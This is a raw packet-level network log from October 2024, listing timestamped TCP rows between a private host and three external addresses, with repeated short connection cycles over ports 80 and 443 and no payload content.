Oct 21, 2024 11:04:07.879190922 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.879280090 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.879323006 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.879436016 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.879479885 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.879991055 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.880033016 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.880033970 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.880043983 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.880083084 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.880177021 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.880218983 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.880223036 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.880227089 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.880258083 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.880861998 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.880908012 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.880913019 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.880953074 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.881030083 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.881074905 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.935729027 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.935771942 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.936011076 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.936013937 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.936021090 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.936059952 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.936067104 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.936072111 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.936111927 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.936116934 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.936160088 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.936466932 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.936527967 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.936532021 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.936578989 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.936857939 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.936897039 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.936908007 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.936912060 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.936934948 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.936964035 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.936965942 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.937016010 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.937397957 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.937429905 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.937438965 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.937443972 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.937473059 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.937478065 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.937498093 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.937501907 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.937529087 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.937545061 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.937547922 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.937588930 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.938328028 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.938363075 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.938375950 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.938380003 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.938396931 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.938401937 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.938419104 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.938429117 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.938432932 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.938458920 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.938486099 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.938488960 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.938525915 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.939245939 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.939280987 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.939291000 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.939295053 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.939315081 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.939316988 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.939342022 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.939344883 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.939352036 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.939368010 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.939398050 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.939405918 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.939445972 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.940161943 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.940195084 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.940215111 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.940216064 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.940222979 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.940232038 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.940262079 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.940264940 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.940272093 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.940305948 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.940310001 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.940352917 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.941076994 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.941108942 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.941123962 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.941128969 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.941138983 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.941148043 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.941173077 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.941174030 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.941179991 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.941198111 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.941226006 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.941230059 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.941272020 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.941884041 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.941927910 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.991863012 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.992084026 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.992109060 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.992152929 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.992161036 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.992202044 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.992695093 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.992746115 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.992749929 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.992794991 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.992913961 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.992959023 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.993057966 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.993103027 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.993316889 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.993350983 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.993360996 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.993365049 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.993390083 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.993418932 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.993422031 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.993778944 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.993830919 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.993835926 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.993874073 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.994194984 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.994225979 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.994241953 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.994246006 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.994266987 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.994293928 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.994297028 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.994667053 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.994689941 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.994712114 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.994714975 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.994719028 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.994736910 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.994755983 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.994765043 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.994769096 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.994796991 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.994808912 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.994859934 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:07.994896889 CEST	443	62509	216.58.206.33	192.168.2.4
Oct 21, 2024 11:04:07.994946957 CEST	62509	443	192.168.2.4	216.58.206.33
Oct 21, 2024 11:04:08.203102112 CEST	62510	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:08.207928896 CEST	80	62510	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:08.208857059 CEST	62510	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:08.209033012 CEST	62510	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:08.213788033 CEST	80	62510	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:08.885462999 CEST	80	62510	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:08.888746977 CEST	62510	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:08.893769979 CEST	80	62510	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:09.039673090 CEST	80	62510	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:09.084666967 CEST	62510	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:09.385740995 CEST	62511	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:09.385777950 CEST	443	62511	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:09.385849953 CEST	62511	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:09.387270927 CEST	62511	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:09.387283087 CEST	443	62511	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:10.004158974 CEST	443	62511	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:10.004265070 CEST	62511	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:10.007759094 CEST	62511	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:10.007769108 CEST	443	62511	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:10.008037090 CEST	443	62511	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:10.013812065 CEST	62511	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:10.059444904 CEST	443	62511	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:10.153049946 CEST	443	62511	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:10.153140068 CEST	443	62511	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:10.153211117 CEST	62511	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:10.159548998 CEST	62511	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:10.164840937 CEST	62510	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:10.170443058 CEST	80	62510	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:10.315489054 CEST	80	62510	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:10.317401886 CEST	62512	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:10.317430973 CEST	443	62512	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:10.317500114 CEST	62512	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:10.317717075 CEST	62512	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:10.317728043 CEST	443	62512	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:10.365945101 CEST	62510	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:10.917197943 CEST	443	62512	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:10.918683052 CEST	62512	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:10.918699980 CEST	443	62512	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:11.057774067 CEST	443	62512	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:11.057853937 CEST	443	62512	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:11.057914019 CEST	62512	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:11.063193083 CEST	62512	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:11.066512108 CEST	62510	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:11.067517996 CEST	62513	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:11.071727991 CEST	80	62510	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:11.071788073 CEST	62510	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:11.072344065 CEST	80	62513	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:11.072413921 CEST	62513	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:11.072485924 CEST	62513	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:11.077195883 CEST	80	62513	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:11.715086937 CEST	80	62513	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:11.716288090 CEST	62514	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:11.716329098 CEST	443	62514	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:11.716401100 CEST	62514	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:11.716624022 CEST	62514	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:11.716639996 CEST	443	62514	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:11.756572008 CEST	62513	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:12.329098940 CEST	443	62514	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:12.330562115 CEST	62514	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:12.330594063 CEST	443	62514	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:12.473431110 CEST	443	62514	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:12.473562956 CEST	443	62514	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:12.473617077 CEST	62514	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:12.473943949 CEST	62514	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:12.477853060 CEST	62515	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:12.482795954 CEST	80	62515	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:12.482908964 CEST	62515	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:12.482969046 CEST	62515	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:12.487750053 CEST	80	62515	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:13.137375116 CEST	80	62515	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:13.140327930 CEST	62516	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:13.140386105 CEST	443	62516	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:13.140460968 CEST	62516	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:13.140693903 CEST	62516	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:13.140722990 CEST	443	62516	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:13.178451061 CEST	62515	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:13.748651028 CEST	443	62516	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:13.750138998 CEST	62516	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:13.750186920 CEST	443	62516	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:13.894489050 CEST	443	62516	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:13.894607067 CEST	443	62516	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:13.894661903 CEST	62516	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:13.894957066 CEST	62516	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:13.897870064 CEST	62515	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:13.898330927 CEST	62517	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:13.903158903 CEST	80	62517	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:13.903220892 CEST	62517	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:13.903266907 CEST	62517	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:13.903485060 CEST	80	62515	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:13.903536081 CEST	62515	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:13.908087015 CEST	80	62517	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:14.552258968 CEST	80	62517	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:14.553539038 CEST	62518	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:14.553620100 CEST	443	62518	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:14.553713083 CEST	62518	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:14.553911924 CEST	62518	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:14.553924084 CEST	443	62518	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:14.600311995 CEST	62517	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:15.171502113 CEST	443	62518	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:15.172936916 CEST	62518	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:15.172995090 CEST	443	62518	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:15.313137054 CEST	443	62518	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:15.313262939 CEST	443	62518	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:15.313317060 CEST	62518	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:15.313632011 CEST	62518	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:15.316509962 CEST	62517	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:15.317513943 CEST	62519	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:15.323702097 CEST	80	62519	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:15.323787928 CEST	62519	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:15.323848009 CEST	62519	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:15.324007034 CEST	80	62517	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:15.324055910 CEST	62517	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:15.330329895 CEST	80	62519	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:15.967912912 CEST	80	62519	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:15.968991995 CEST	62520	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:15.969037056 CEST	443	62520	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:15.969100952 CEST	62520	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:15.969316006 CEST	62520	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:15.969327927 CEST	443	62520	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:16.022195101 CEST	62519	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:16.592363119 CEST	443	62520	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:16.594029903 CEST	62520	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:16.594048977 CEST	443	62520	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:16.744159937 CEST	443	62520	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:16.744260073 CEST	443	62520	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:16.744409084 CEST	62520	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:16.744663000 CEST	62520	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:16.747600079 CEST	62519	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:16.748712063 CEST	62521	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:16.752969980 CEST	80	62519	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:16.753053904 CEST	62519	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:16.753643990 CEST	80	62521	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:16.753717899 CEST	62521	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:16.753762960 CEST	62521	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:16.758598089 CEST	80	62521	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:17.403842926 CEST	80	62521	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:17.404880047 CEST	62522	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:17.404912949 CEST	443	62522	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:17.404979944 CEST	62522	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:17.405198097 CEST	62522	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:17.405213118 CEST	443	62522	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:17.444047928 CEST	62521	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:18.050585032 CEST	443	62522	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:18.051927090 CEST	62522	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:18.051947117 CEST	443	62522	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:18.194622993 CEST	443	62522	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:18.194716930 CEST	443	62522	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:18.194773912 CEST	62522	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:18.195139885 CEST	62522	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:18.198138952 CEST	62521	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:18.199141979 CEST	62523	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:18.203429937 CEST	80	62521	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:18.203497887 CEST	62521	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:18.203972101 CEST	80	62523	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:18.204092979 CEST	62523	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:18.204130888 CEST	62523	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:18.208906889 CEST	80	62523	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:18.845242023 CEST	80	62523	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:18.846343994 CEST	62524	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:18.846421003 CEST	443	62524	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:18.846503019 CEST	62524	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:18.846731901 CEST	62524	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:18.846767902 CEST	443	62524	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:18.897270918 CEST	62523	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:19.642677069 CEST	443	62524	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:19.644118071 CEST	62524	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:19.644176006 CEST	443	62524	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:19.783818960 CEST	443	62524	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:19.783904076 CEST	443	62524	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:19.784120083 CEST	62524	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:19.784383059 CEST	62524	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:19.786856890 CEST	62523	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:19.787756920 CEST	62525	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:19.792186975 CEST	80	62523	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:19.792246103 CEST	62523	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:19.792644024 CEST	80	62525	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:19.792712927 CEST	62525	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:19.792762995 CEST	62525	80	192.168.2.4	158.101.44.242
